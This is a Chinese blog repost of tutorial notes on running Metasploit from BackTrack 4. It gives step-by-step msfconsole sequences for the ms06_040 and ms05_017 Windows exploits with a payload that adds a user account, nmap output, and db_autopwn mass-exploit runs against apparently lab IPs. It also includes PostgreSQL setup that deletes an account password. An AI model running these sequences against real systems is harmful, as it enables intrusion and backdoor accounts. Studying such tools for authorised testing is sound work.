网络安全:漏洞测试主要平台 BackTrack4+Metasploit+ruby

最新推荐文章于 2023-04-20 11:08:54 发布
最新推荐文章于 2023-04-20 11:08:54 发布
阅读量329 收藏
点赞数
文章标签: ruby 操作系统 网络
原文链接:http://www.cnblogs.com/Gemgin/archive/2013/06/13/3136223.html
版权

BackTrack4-Final linux 系统
常用命令 :startx poweroff

BackTrack 4后使用了ubuntu 8.10 的系统,而且只能装Debian的软件包。   
2011年5月11,BackTrack发布了最新的BackTrack5,基于ubuntu10.04 LTS(Long-Term Support) 内核为Kernel 2.6.38。本版BackTrack对于无线安全的检查能力更为强悍,当然BackTrack不仅仅是用来战争驾驶,还集成了包括Metasploit200多种安全检查工具,此外众多的RFID工具也是一个亮点。

Metasploit + ruby 漏洞发掘主要平台

Metasploit安全测试工具   Metasploit是一款开源的安全漏洞检测工具,同时Metasploit是免费的工具,因此安全工作人员常用Metasploit工具来检测系统的安全性

例如使用ms06040这个漏洞,步骤如下(不唯一):   
 show exploits //显示可用的exploit,以BSD开头的是针对BSD系统的ShellCode,以Linx开头的是针对Linux系统的ShellCode,以CMDWIN开头的是针对Windows系统。  
 info windows/smb/ms06_040_netapi //查看这个exploit的相关信息   
 use windows/smb/ms06_040_netapi //使用这个exploit   
 show options //显示这个漏洞利用的参数   
 set RHOST 192.168.1.11 //设置远程主机地址这个参数   
 show targets //显示exploit支持的操作系统类型  
 set TARGET 0 //设置目标为0所代表的那个操作系统类型  
 show payloads //显示与正在使用的漏洞利用兼容的有效负载,说白了Payload就是我们平时说的ShellCode,不同的系统对不同的ShellCode要求是不一样。   
 set PAYLOAD windows/exec //设置有效载荷为执行特定命令   
 show options //显示相关参数   
 set CMD "et user hello world /add"nbsp; //设置要执行的命令为添加一个帐号  
 set //检查环境设置   
 check //检查目标是否存在相关漏洞   
 exploit //检查无误后即可进行溢出了

// Metasploit 单一目标溢出,需要用namp收集信息

msf > use exploit/windows/dcerpc/ms05_017_msmq
msf > set TARGET 0
TARGET => 0
msf exploit(ms05_017_msmq) > set PAYLOAD windows/exec
PAYLOAD => windows/exec
msf exploit(ms05_017_msmq) > set CMD net user test test123456789 /add
CMD => net user test  test123456789 /add
msf exploit(ms05_017_msmq) > set RHOST 192.168.1.245
msf exploit(ms05_017_msmq) > set HNAME ww-server2000
RHOST => 192.168.1.245
HNAME => ww-server2000
msf exploit(ms05_017_msmq) > exploit
[-] Exploit exception: The connection was refused by the remote host (192.168.1.245:2103).
[*] Exploit completed, but no session was created. //失败

// Metasploit postgresql 自动溢出出现的问题

root@bt:~# /etc/init.d/postgresql-8.3 start
Starting PostgreSQL 8.3 database server: main* The PostgreSQL server failed to start. Please check the log output:
2011-10-30 20:58:27 EDT FATAL: could not load server certificate file "server.crt": No such file or directory


kate /etc/postgresql/8.3/main/postgresql.confkate /etc/postgresql/8.3/main/postgresql.conf


# - Security and Authentication -

#authentication_timeout = 1min # 1s-600s
#ssl = true # (change requires restart)
#ssl_ciphers = 'ALL:!ADH:!LOW:!EXP:!MD5:@STRENGTH' # allowed SSL ciphers
# (change requires restart)
#password_encryption = on
#db_user_namespace = off

root@bt:~# /etc/init.d/postgresql-8.3 start
Starting PostgreSQL 8.3 database server: main. #成功启动 ssl = true ->#ssl = true 少了"#"


sudo su postgres -c psql ALTER USER postgres WITH PASSWORD '123456789';
sudo passwd -d postgres
sudo su postgres -c passwd
set RHOST 192.168.1.103

查看更多精彩图片

查看更多精彩图片

查看更多精彩图片

//Metasploit postgresql自动溢出命令
msf > /etc/init.d/postgresql-8.3 stop
[*] exec: /etc/init.d/postgresql-8.3 stop
msf > /etc/init.d/postgresql-8.3 start
[*] exec: /etc/init.d/postgresql-8.3 start
Starting PostgreSQL 8.3 database server: main.
msf > db_driver postgresql
[*] Using database driver postgresql
msf > db_connect postgres:"123456789"@127.0.0.1/metasploit
msf > set RHOST 192.168.1.103
RHOST => 192.168.1.103
msf > db_nmap 192.168.1.103
[*] Nmap: Starting Nmap 5.35DC1 ( http://nmap.org ) at 2011-10-30 22:03 EDT
[*] Nmap: Nmap scan report for 192.168.1.245
[*] Nmap: Host is up (0.0024s latency).
[*] Nmap: Not shown: 993 closed ports
[*] Nmap: PORT STATE SERVICE
[*] Nmap: 135/tcp open msrpc
[*] Nmap: 139/tcp open netbios-ssn
[*] Nmap: 445/tcp open microsoft-ds
[*] Nmap: 1025/tcp open NFS-or-IIS
[*] Nmap: 1026/tcp open LSA-or-nterm
[*] Nmap: 3372/tcp open msdtc
[*] Nmap: 3389/tcp open ms-term-serv
[*] Nmap: MAC Address: 00:0C:29:E7:8F:60 (VMware)
[*] Nmap: Nmap done: 1 IP address (1 host up) scanned in 0.31 seconds
msf >db_autopwn -p -e -x -r -I 192.168.1.103
[-]
[-] Warning: The db_autopwn command is deprecated and will be removed in a future version.
[-] This code is not well maintained, crashes systems, and crashes itself.
[-]
[*] (49/50 [0 sessions]): Launching exploit/windows/smb/psexec against 192.168.1.103:445...
[*] (50/50 [0 sessions]): Launching exploit/windows/smb/timbuktu_plughntcommand_bof against 192.168.1.103:445...
[*] (50/50 [0 sessions]): Waiting on 40 launched modules to finish execution...
[*] (50/50 [0 sessions]): Waiting on

--------------------------------------------------------------------------
Metasploit sqlite3自动溢出命令
msf>load db_sqlite3
msf>db_create
msf>db_nmap 192.168.1.245
msf>db_autopwn -p -e -x -r -I 192.168.1.103

msf>db_autopwn -p -e -q

Hosts
=====

address mac name os_name os_flavor os_sp purpose info comments
------- --- ---- ------- --------- ----- ------- ---- --------
192.168.1.103 00:0C:29:E7:A4:82
192.168.1.199 00:0C:29:E7:A4:84
192.168.1.245 00:0C:29:E7:8F:60 WW-SERVER2000 Microsoft Windows 2000 SP4 client

转载于:https://www.cnblogs.com/Gemgin/archive/2013/06/13/3136223.html

ann__1121
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
[渗透测试笔记] 19.msf初步
H4ppyD0g的博客
05-05 502
msf利用浏览器漏洞渗透 这里利用IE6和漏洞ms10_018 原理:自己制作一个网上的资源,通过让目标主机访问这个资源,利用目标主机中浏览器的漏洞来共同导致被攻击的结果。 msfconsole启动msf search ms10_018查看相关漏洞 use exploit/windows/browser/ms10_018_ie_behaviors选择相应模块 set LHOST 192.168.2...
无线网络密码破解软件BackTrack3+spoonwep2中文包+闪盘制作教程汇编.pdf
02-27
无线网络密码破解软件BackTrack3+spoonwep2中文包+闪盘制作教程汇编.pdf
MSF漏洞利用完成但无法创建会话的几种原因
热门推荐
慢就是快
12-02 3万+
文章目录1.引言2.原因2.1漏洞payload和目标架构不匹配2.1.1 解决办法2.2 参数LHOST/SRVHOST 配置不当2.2.1 解决办法2.3 使用了NAT模式2.3.1 解决办法2.4存在杀软/EDR终端管理等2.4.1 解决办法2.5漏洞利用模块存在问题2.5.1 解决办法2.6目标已经修复漏洞打了补丁2.6.1 解决办法2.7 防火墙限制2.7.1 解决办法 1.引言 在实际攻防中经常用到一些漏洞模块去测试目标是否存在对应漏洞,比如下列模块: exploit/windows/smb/p
exploit已完成,但没有创建会话exploit completed, but no session was created
08-22 1万+
The "no session was created" message occurs if one of the following happens: 1) The exploit you use doesn't work against the target you selected. Could be the exploit is for a different ve...
网络安全漏洞检测
weixin_66469999的博客
08-03 2056
并检测靶机是否存在漏洞,运行此模块,将回显结果中倒数第。拒绝服务漏洞攻击模块,将运行此模块后回显结果中倒数第。拒绝服务漏洞的辅助扫描模块,将调用此模块的命令作为。拒绝服务攻击模块,将回显结果中的漏洞披露时间作为。运行并找到最后一行一个单词。运行并找到最后一个单词。行的最后一个单词作为。行的最后一个单词作为。...
常见Web安全漏洞测试方法
VN520的博客
04-20 830
1、永远不要信任用户的输入。对用户的输入进行校验,可以通过正则表达式或限制长度;对单引号和双"-"进行转换等。2、永远不要使用动态拼装SQL,可以使用参数化的SQL或者直接使用存储过程进行数据查询存取。3、永远不要使用管理员权限的数据库连接,为每个应用使用单独的权限有限的数据库连接。4、不要把机密信息直接存放,加密或者Hash掉密码和敏感的信息。5、应用的异常信息应该给出尽可能少的提示,最好使用自定义的错误信息对原始错误信息进行包装。
Metasploit with MYSQL in BackTrack 4 r2.txt
03-18
Metasploit with MYSQL in BackTrack 4 r2.txt
BackTrack4利用渗透测试保证系统安全
03-18
BackTrack4利用渗透测试保证系统安全
BackTrack Metasploit专题文集
03-11
Metasploit是一款开源的安全漏洞检测工具,可以帮助安全和IT专业人士识别安全性问题,验证漏洞的缓解措施,并管理专家驱动的安全性进行评估,提供真正的安全风险情报。这些功能包括智能开发,密码审计,Web应用程序...
msf反弹shell成功,却无法建立会话处理办法
yang1234567898的博客
01-07 4454
报错:Exploit failed [bad-config]: Rex::BindFailed The address is already in use or unavailable: (0.0.0.0:4444). 如果run的时候出现以下问题导致建立会话失败,可能是端口4444被占用了, 在终端输入 “netstat -tulpen”,查看进程端口信息 通过命令”fuser -k 端口号/tcp“,删除4444端口进程 ...
db_autopwn.rb
08-26
MSF 4.5版本,没有了db_autopwn模块,此功能不能使用。 ==================================================== 可利用此插件,下载db_autopwn的执行脚本,并且复制到/opt/metasploit/msf3/plugins/中。 运行:load db_autopwn.rb 提示,每次使用都得运行一次load db_autopwn =======================================================
BackTrack 4 Final Release ISO_BT种子
04-02
BackTrack4(BT4) Final ISO光盘BT种子.
BackTrack 5 R3 Released
12-12
附件只是提供下载链接,包括如下版本: BT5R3-GNOME-64.torrent (md5: 8cd98b693ce542b671edecaed48ab06d) BT5R3-GNOME-32.torrent (md5: aafff8ff5b71fdb6fccdded49a6541a0) BT5R3-KDE-64.torrent (md5: 981b897b7fdf34fb1431ba84fe93249f) BT5R3-KDE-32.torrent (md5: d324687fb891e695089745d461268576) BT5R3-GNOME-32-VM.torrent (md5: bca6d3862c661b615a374d7ef61252c5)
BackTrack4 R2.torrent
09-12
BackTrack4 R2.torrent
渗透测试之踩点篇
自学编程_youkewang.top
02-15 4440
网络踩点犹如躲在暗处的狙击手,只观察情况而不进行射击,有 踩点的以下途径: 1:通过搜索引擎进行信息收集 1.1:google Hacking技术 搜索工具. 1:SiteDigger 2:Search Diggity (此款软件还支持对源代码、恶意软件等进行分析)   1.2:探索网站的目录结构 1:常见的后台管理目录:admin、login、cms 通过google来
【MSFconsole进阶】exploits(渗透攻击模块):Active Exploit(主动渗透攻击)、Passive Exploit(被动渗透攻击
05-22 3399
【渗透工具】MSFconsole进阶:exploits(渗透攻击模块)
msfconsole攻击ftp_MetaSploit攻击实例讲解------Metasploit自动化攻击(包括kali linux 2016.2(rolling) 和 BT5)...
weixin_29341975的博客
12-28 1284
msf > db_autopwn -e -t -r -p[-] The db_autopwn command isDEPRECATED[-] See http://r-7.co/xY65Zr instead[-][-] Warning: The db_autopwn command is not officially supported and exists only ina bra...
nmap 查看主机上开放的端口
02-24 1944
作用: 检测网络上的主机检测主机上开放的端口检测操作系统,硬件地址,以及软件版本检测脆弱性的漏洞(Nmap的脚本) 扫描方式: 1. -sS Tcp SYN Scan 不需要三次握手,速度快 优点:半开放扫描,Nmap发送SYN包到远程主机,但是它不会产生任何会话,目标主机几乎不会把连接记入系统日志。(防止对方判断为扫描攻击),扫描速度快,效率高,在工作中使用频率最高 ...
ms05-017漏洞原理与复现
weixin_34250434的博客
09-13 1178
漏洞描述 此漏洞由lds-pl.net漏洞研究组在2003年7月16日发现,漏洞及exp在网上公开后,网上出现了大量的×××实例,利用此漏洞的蠕虫也大量出现。 漏洞编号 CVE-2005-0059 OSVDB-15458 MSB-MS05-017 BID-13112 ×××目标 DCOM接口的服务器端 影响系统 Microsoft Windows XP Service Pack 1 ...
3x+4y+2z≤12
最新发布
05-31
好的,下面是使用回溯法求解该不等式的所有整数解的伪代码: ``` Backtrack(x, y, z): if 3x + 4y + 2z > 12: return # 不符合条件,回溯 ...这些解都满足不等式 3x+4y+2z,同时 x, y, z 都是整数。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值